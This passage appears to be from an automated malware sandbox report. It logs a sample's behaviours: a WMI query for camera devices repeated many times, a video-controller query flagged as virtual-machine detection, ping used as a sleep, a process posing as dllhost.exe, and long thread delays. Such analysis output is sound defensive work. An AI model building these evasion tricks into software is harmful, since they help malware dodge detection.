                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Uses ping.exe to sleep
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Bridgemonitor\BridgeInto.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeMemory allocated: 1AD10000 memory reserve | memory write watchJump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeMemory allocated: 1390000 memory reserve | memory write watch
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeMemory allocated: 1B320000 memory reserve | memory write watch
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeMemory allocated: 9F0000 memory reserve | memory write watch
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeMemory allocated: 1A6D0000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exeMemory allocated: 13D0000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exeMemory allocated: 1AEC0000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exeMemory allocated: 1870000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exeMemory allocated: 1B210000 memory reserve | memory write watch
                              Source: C:\Recovery\dllhost.exeMemory allocated: 1680000 memory reserve | memory write watch
                              Source: C:\Recovery\dllhost.exeMemory allocated: 1B0B0000 memory reserve | memory write watch
                              Source: C:\Recovery\dllhost.exeMemory allocated: 2B10000 memory reserve | memory write watch
                              Source: C:\Recovery\dllhost.exeMemory allocated: 1ACF0000 memory reserve | memory write watch
                              Source: C:\Bridgemonitor\BridgeInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 922337203685477
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 600000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 599874
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 599734
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 599000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 3600000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 598500
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 598343
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 597609
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 597390
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 597125
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 597000
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 596875
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 596656
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 596499
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 596296
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 595562
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594828
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594677
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594531
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594397
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594198
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 594093
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593965
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593855
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593740
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593608
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593499
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593390
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593280
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593170
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 593058
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 592950
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 592843
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 592731
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 592015
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591905
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591796
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591687
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591578
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591468
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591358
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591210
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 591108
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590999
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590883
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590781
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590671
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeThread delayed: delay time: 590562
